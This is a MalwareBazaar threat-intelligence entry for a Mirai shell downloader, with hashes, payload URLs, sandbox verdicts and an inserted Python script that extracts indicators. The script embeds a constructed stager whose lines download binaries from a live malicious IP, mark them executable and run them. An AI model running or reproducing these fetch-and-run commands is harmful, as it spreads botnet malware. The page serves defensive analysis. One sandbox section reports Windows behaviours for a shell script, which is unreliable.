MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 7



SHA256 hash: 41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7
SHA3-384 hash: 209227d0f19e6f768dc9e985e39cf36b44b97cdc464272b8d2dee63ec745a1a5695bcedde77bd7b2dc202532be7d6aab
SHA1 hash: d3812fb6016df33a9e16fdf4fbeb5ccf84999cc6
MD5 hash: 68780681b329253d649e9fbc0e034c06
humanhash: king-rugby-london-skylark
File name: chomp
Signature: Mirai
File size: 156 bytes
First seen: 2025-12-21 15:14:29 UTC
Last seen: 2025-12-22 01:15:09 UTC
File type: sh
MIME type: text/plain
ssdeep: 3:LxAjdVZVb8NBzSa+ANja8PeFKRDxAjdVZVCONBzSa5Ap9MVv:L6VbkPjNaKD6Vxy+Vv
TLSH: T14EC0809F10271541C108FE2011F5301DB181C9C235B00B0D97D92433F8CD500B71CD11
Magika: shell
Reporter: abuse_ch
Tags: sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://130.12.180.64/splmips | 2928a4694f399990791e7d0c00cb21c7fe852654df493d541097b7ce85815ec5 | Mirai | elf mirai ua-wget
http://130.12.180.64/splmpsl | 3cd8a62933ca2ee92f4a556c9d59ae1679070eec6343b38d6ef6f75cf5190ced | Mirai | elf mirai ua-wget

Intelligence


File Origin
# of uploads: 2
# of downloads: 39
Origin country: DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
mirai
Verdict:
Malicious
File Type:
text
First seen:
2025-12-21T12:37:00Z UTC
Last seen:
2025-12-23T00:53:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.p
Status:
terminated
Behavior Graph (process tree recovered from the rendered graph; the sample itself is /tmp/sample.bin, launched via sudo):
  pid 2464 /usr/bin/sudo
    execve -> pid 2470 /tmp/sample.bin
      execve -> pid 2472 /usr/bin/wget (net, send-data, write-file); sends 135 B to 130.12.180.64:80
      execve -> pid 2491 /usr/bin/chmod
      clone  -> pid 2492 /usr/bin/dash
      execve -> pid 2495 /usr/bin/wget (net, send-data, write-file); sends 135 B to 130.12.180.64:80
      execve -> pid 2507 /usr/bin/chmod
      clone  -> pid 2509 /usr/bin/dash
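The process tree above (wget, then chmod, then execution through dash, twice, against 130.12.180.64:80) together with the two URLs in the entry's IOC table is the standard shape of a Mirai stager script. The following is an added example, not code from MalwareBazaar or from the sample: a small IOC extractor that walks a downloader script of that shape and reports fetch URLs, hosts, architecture hints, the files that get chmod'ed and executed, and a defanged form for reporting. The script text it parses is constructed to mirror the behaviour graph and uses the two URLs and SHA256 values listed on this page; the actual 156-byte "chomp" sample is not reproduced here, and the `KNOWN_PAYLOADS` mapping and `defang` helper are this example's own.

```python
"""IOC extraction for a Mirai-style shell downloader (added example).

The SAMPLE_SCRIPT below is CONSTRUCTED for this example to match the process
tree in the MalwareBazaar entry (wget -> chmod -> exec via dash). It is not the
real 'chomp' sample, whose contents the entry does not show.
"""
import json
import re
from urllib.parse import urlparse

# Constructed stager text (assumption, not the sample's actual bytes). The two
# URLs are the ones listed in the entry's "URL / Malware sample" table.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://130.12.180.64/splmips -O mips; chmod +x mips; ./mips
wget http://130.12.180.64/splmpsl -O mpsl; chmod +x mpsl; ./mpsl
"""

# SHA256 of each payload exactly as the entry's IOC table reports it.
KNOWN_PAYLOADS = {
    "http://130.12.180.64/splmips": "2928a4694f399990791e7d0c00cb21c7fe852654df493d541097b7ce85815ec5",
    "http://130.12.180.64/splmpsl": "3cd8a62933ca2ee92f4a556c9d59ae1679070eec6343b38d6ef6f75cf5190ced",
}

URL_RE = re.compile(r"""(?:https?|ftp|tftp)://[^\s'";|&<>()]+""")
FETCH_TOOLS = ("wget", "curl", "tftp", "ftpget")
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}
# Longer hints first so "mpsl" is not mistaken for "mips" or "arm7" for "arm".
ARCH_HINTS = ("mpsl", "mips", "arm7", "arm", "x86", "i686", "sh4", "ppc", "m68k", "spc")


def split_commands(script_text):
    """Split shell text into simple commands on newlines, ';', '&&', '||' and '|'."""
    commands = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for cmd in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line):
            if cmd:
                commands.append(cmd)
    return commands


def arch_hint(path):
    """Guess the target architecture from the payload file name (Mirai naming habit)."""
    name = path.rsplit("/", 1)[-1].lower()
    for hint in ARCH_HINTS:
        if hint in name:
            return hint
    return None


def extract_iocs(script_text):
    """One record per remote fetch: url, host, port, path, tool, arch and known SHA256."""
    iocs = []
    for cmd in split_commands(script_text):
        argv = cmd.split()
        tool = argv[0] if argv and argv[0] in FETCH_TOOLS else "unknown"
        for url in URL_RE.findall(cmd):
            parsed = urlparse(url)
            iocs.append({
                "url": url,
                "host": parsed.hostname,
                "port": parsed.port or DEFAULT_PORTS.get(parsed.scheme),
                "path": parsed.path,
                "tool": tool,
                "arch": arch_hint(parsed.path),
                "sha256": KNOWN_PAYLOADS.get(url),  # None if the entry does not list it
            })
    return iocs


def executed_files(script_text):
    """Files the script marks executable and then runs as ./name, in execution order."""
    chmodded, run = set(), []
    for cmd in split_commands(script_text):
        argv = cmd.split()
        if not argv:
            continue
        if argv[0] == "chmod" and len(argv) >= 3:
            chmodded.update(argv[2:])
        elif argv[0].startswith("./") and argv[0][2:] in chmodded:
            run.append(argv[0][2:])
    return run


def defang(url):
    """Rewrite a URL so it cannot be clicked by accident: hxxp scheme, [.] in the host."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def summarize(script_text):
    """Compact report suitable for a ticket or a blocklist feed."""
    iocs = extract_iocs(script_text)
    return {
        "hosts": sorted({i["host"] for i in iocs}),
        "urls": [i["url"] for i in iocs],
        "defanged": [defang(i["url"]) for i in iocs],
        "executes": executed_files(script_text),
        "all_known": all(i["sha256"] is not None for i in iocs),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_SCRIPT), indent=2))
```

Run it against a real stager only inside an isolated analysis host; the parser never fetches anything, it only reads text, so it is safe on the sample itself, but the URLs it prints are live payload locations and should be handled defanged outside the lab.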
Threat name:
Script-Shell.Downloader.Heuristic
Status:
Malicious
First seen:
2025-12-21 15:37:14 UTC
File Type:
Text (Shell)
AV detection:
3 of 24 (12.50%)
Threat level:
  2/5
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method | Signature | File type | SHA256 hash
Web download | Mirai | sh | 41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7 (this sample)

Delivery method: Distributed via web download
